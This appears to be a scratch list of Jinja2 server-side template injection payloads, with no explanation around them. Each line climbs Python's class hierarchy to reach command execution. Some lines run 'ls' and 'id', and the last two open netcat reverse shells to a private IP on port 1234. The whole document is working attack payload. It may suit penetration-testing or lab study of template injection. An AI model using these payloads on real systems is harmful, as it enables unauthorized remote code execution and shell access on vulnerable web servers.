{{ ''.__class__.__mro__[1].__subclasses__()[xxx]('ls', shell=True, stdout=-1).communicate() }}


{{ ''.__class__.__mro__[1].__subclasses__() }}


{{ ''.__class__.__mro__[1].__subclasses__() }}


{{ cycler._init_.__globals__.os.popen('id').read() }}

{{ cycler.__init__.__globals__.os.popen('id').read() }}

{{ cycler.__init__.__globals__['os'].popen("rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.52.150 1234 >/tmp/f").read() }}

{{ cycler.__init__.__globals__['os'].popen("nc 192.168.52.150 1234 -e /bin/sh").read() }}
